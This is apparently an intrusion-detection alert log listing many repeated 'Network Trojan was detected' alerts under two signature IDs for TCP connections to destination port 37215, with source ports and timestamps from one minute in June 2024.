                SID:2829579
                Source Port:49164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517362
                SID:2835222
                Source Port:57594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504896
                SID:2829579
                Source Port:44100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022749
                SID:2829579
                Source Port:59692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011062
                SID:2829579
                Source Port:41394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177088
                SID:2835222
                Source Port:50296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073344
                SID:2829579
                Source Port:55314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906954
                SID:2829579
                Source Port:50070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914652
                SID:2835222
                Source Port:44888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804334
                SID:2829579
                Source Port:52552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675424
                SID:2835222
                Source Port:58974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146748
                SID:2835222
                Source Port:37526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074276
                SID:2829579
                Source Port:55926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662615
                SID:2835222
                Source Port:53602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914870
                SID:2835222
                Source Port:58110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186230
                SID:2835222
                Source Port:39838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031806
                SID:2829579
                Source Port:60542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791129
                SID:2835222
                Source Port:59792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881520
                SID:2835222
                Source Port:47108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521462
                SID:2829579
                Source Port:45264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716098
                SID:2829579
                Source Port:34062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503268
                SID:2829579
                Source Port:46132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661950
                SID:2835222
                Source Port:46274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666391
                SID:2829579
                Source Port:52130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409368
                SID:2829579
                Source Port:55754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143016
                SID:2835222
                Source Port:46894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.089992
                SID:2829579
                Source Port:44424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.224520
                SID:2829579
                Source Port:51210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971137
                SID:2835222
                Source Port:54564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111755
                SID:2829579
                Source Port:34244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027455
                SID:2829579
                Source Port:43910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253320
                SID:2829579
                Source Port:43180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.992043
                SID:2829579
                Source Port:50646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227099
                SID:2829579
                Source Port:49234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997114
                SID:2835222
                Source Port:32844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701098
                SID:2835222
                Source Port:45224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057267
                SID:2835222
                Source Port:49524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134870
                SID:2835222
                Source Port:38270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020171
                SID:2835222
                Source Port:35006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.086829
                SID:2829579
                Source Port:58986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761099
                SID:2835222
                Source Port:48758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341936
                SID:2835222
                Source Port:44440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615011
                SID:2829579
                Source Port:41440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030478
                SID:2835222
                Source Port:42274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640696
                SID:2835222
                Source Port:34688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013898
                SID:2835222
                Source Port:35448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452952
                SID:2829579
                Source Port:38638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726565
                SID:2835222
                Source Port:41874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025107
                SID:2835222
                Source Port:54680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420487
                SID:2835222
                Source Port:52504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615854
                SID:2835222
                Source Port:52112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679500
                SID:2829579
                Source Port:40462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772496
                SID:2829579
                Source Port:46900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013513
                SID:2829579
                Source Port:40366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001582
                SID:2829579
                Source Port:40352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777029
                SID:2829579
                Source Port:51492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705589
                SID:2829579
                Source Port:44450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180054
                SID:2835222
                Source Port:45050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365813
                SID:2835222
                Source Port:44150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646687
                SID:2829579
                Source Port:52586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293534
                SID:2829579
                Source Port:34016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451276
                SID:2829579
                Source Port:47832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032120
                SID:2835222
                Source Port:34566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032487
                SID:2829579
                Source Port:55486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073245
                SID:2835222
                Source Port:52460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132438
                SID:2829579
                Source Port:32900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681507
                SID:2835222
                Source Port:60342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806754
                SID:2829579
                Source Port:53276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383555
                SID:2835222
                Source Port:42112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549458
                SID:2829579
                Source Port:42582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471118
                SID:2829579
                Source Port:51284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735971
                SID:2835222
                Source Port:33974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777558
                SID:2835222
                Source Port:49948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.405640
                SID:2835222
                Source Port:57856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132515
                SID:2829579
                Source Port:44812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470804
                SID:2829579
                Source Port:36384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322805
                SID:2835222
                Source Port:50590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829390
                SID:2835222
                Source Port:34456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023358
                SID:2835222
                Source Port:49062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848576
                SID:2835222
                Source Port:50572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227807
                SID:2829579
                Source Port:57248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013420
                SID:2835222
                Source Port:33770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504116
                SID:2829579
                Source Port:50254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423369
                SID:2829579
                Source Port:44148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726207
                SID:2829579
                Source Port:42844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.845959
                SID:2829579
                Source Port:35024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704863
                SID:2835222
                Source Port:46958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813243
                SID:2835222
                Source Port:46948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725704
                SID:2829579
                Source Port:53622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451912
                SID:2835222
                Source Port:39180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687170
                SID:2835222
                Source Port:41554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676607
                SID:2835222
                Source Port:60730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453282
                SID:2829579
                Source Port:51660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640901
                SID:2829579
                Source Port:50048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343695
                SID:2835222
                Source Port:37662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201610
                SID:2835222
                Source Port:53310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688316
                SID:2835222
                Source Port:60230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.897085
                SID:2835222
                Source Port:35854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880306
                SID:2829579
                Source Port:56446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325491
                SID:2835222
                Source Port:48796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367980
                SID:2835222
                Source Port:36086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028201
                SID:2829579
                Source Port:35136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860490
                SID:2829579
                Source Port:53922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914318
                SID:2829579
                Source Port:39600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184370
                SID:2835222
                Source Port:47790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420753
                SID:2829579
                Source Port:40620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804374
                SID:2835222
                Source Port:35178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663289
                SID:2835222
                Source Port:52520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227499
                SID:2835222
                Source Port:45118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804177
                SID:2835222
                Source Port:53080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184440
                SID:2829579
                Source Port:46788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275558
                SID:2835222
                Source Port:55244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661122
                SID:2835222
                Source Port:45986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913468
                SID:2829579
                Source Port:38498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032025
                SID:2835222
                Source Port:51402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.081959
                SID:2835222
                Source Port:48426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502528
                SID:2829579
                Source Port:39940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789027
                SID:2835222
                Source Port:59748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661100
                SID:2835222
                Source Port:53186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423005
                SID:2829579
                Source Port:39282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984714
                SID:2835222
                Source Port:45672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859093
                SID:2829579
                Source Port:46896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451813
                SID:2835222
                Source Port:36374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718808
                SID:2835222
                Source Port:47486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012766
                SID:2835222
                Source Port:51970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411554
                SID:2835222
                Source Port:44740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186314
                SID:2829579
                Source Port:54804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666223
                SID:2829579
                Source Port:37294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133975
                SID:2829579
                Source Port:35666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944794
                SID:2835222
                Source Port:37562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326413
                SID:2835222
                Source Port:58272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666442
                SID:2835222
                Source Port:51872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759163
                SID:2835222
                Source Port:50388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365636
                SID:2835222
                Source Port:50186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828153
                SID:2829579
                Source Port:37358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969565
                SID:2835222
                Source Port:36316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111055
                SID:2829579
                Source Port:34872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.042534
                SID:2835222
                Source Port:54486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504328
                SID:2835222
                Source Port:49120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146419
                SID:2835222
                Source Port:51608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669882
                SID:2835222
                Source Port:47134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761948
                SID:2829579
                Source Port:35654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276795
                SID:2829579
                Source Port:51366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367404
                SID:2835222
                Source Port:43048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991510
                SID:2829579
                Source Port:37290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860682
                SID:2829579
                Source Port:50392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830105
                SID:2835222
                Source Port:47942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917498
                SID:2835222
                Source Port:38234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704046
                SID:2829579
                Source Port:42046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163621
                SID:2829579
                Source Port:38872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699588
                SID:2829579
                Source Port:33858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452262
                SID:2835222
                Source Port:44996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915779
                SID:2835222
                Source Port:39132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777845
                SID:2829579
                Source Port:46580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225793
                SID:2829579
                Source Port:54042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.778939
                SID:2829579
                Source Port:53424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701496
                SID:2829579
                Source Port:60664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275159
                SID:2835222
                Source Port:45028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000335
                SID:2835222
                Source Port:38194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813102
                SID:2835222
                Source Port:36190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668018
                SID:2835222
                Source Port:44954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179376
                SID:2835222
                Source Port:56530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339083
                SID:2829579
                Source Port:40980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019805
                SID:2835222
                Source Port:36880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860959
                SID:2829579
                Source Port:55430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861437
                SID:2835222
                Source Port:48108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366623
                SID:2829579
                Source Port:40218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878966
                SID:2835222
                Source Port:48780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881472
                SID:2835222
                Source Port:51128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057425
                SID:2829579
                Source Port:52944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322548
                SID:2829579
                Source Port:52226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152277
                SID:2829579
                Source Port:53166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670427
                SID:2835222
                Source Port:39456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200747
                SID:2835222
                Source Port:53374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.112279
                SID:2829579
                Source Port:35680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943873
                SID:2829579
                Source Port:41978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504494
                SID:2829579
                Source Port:51208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420275
                SID:2829579
                Source Port:53622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546227
                SID:2829579
                Source Port:58262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689197
                SID:2829579
                Source Port:54140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027772
                SID:2829579
                Source Port:44940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704463
                SID:2829579
                Source Port:44486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369098
                SID:2829579
                Source Port:36412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860718
                SID:2835222
                Source Port:39606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761094
                SID:2829579
                Source Port:37252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181569
                SID:2829579
                Source Port:57484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182527
                SID:2835222
                Source Port:38494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.224720
                SID:2829579
                Source Port:50850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979617
                SID:2829579
                Source Port:33112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227756
                SID:2829579
                Source Port:38258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365748
                SID:2835222
                Source Port:51804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029828
                SID:2829579
                Source Port:36560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321655
                SID:2835222
                Source Port:59768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968693
                SID:2829579
                Source Port:45742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450387
                SID:2829579
                Source Port:40392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073634
                SID:2835222
                Source Port:47014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146878
                SID:2835222
                Source Port:53594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848893
                SID:2829579
                Source Port:47508
                Destination Port:37215
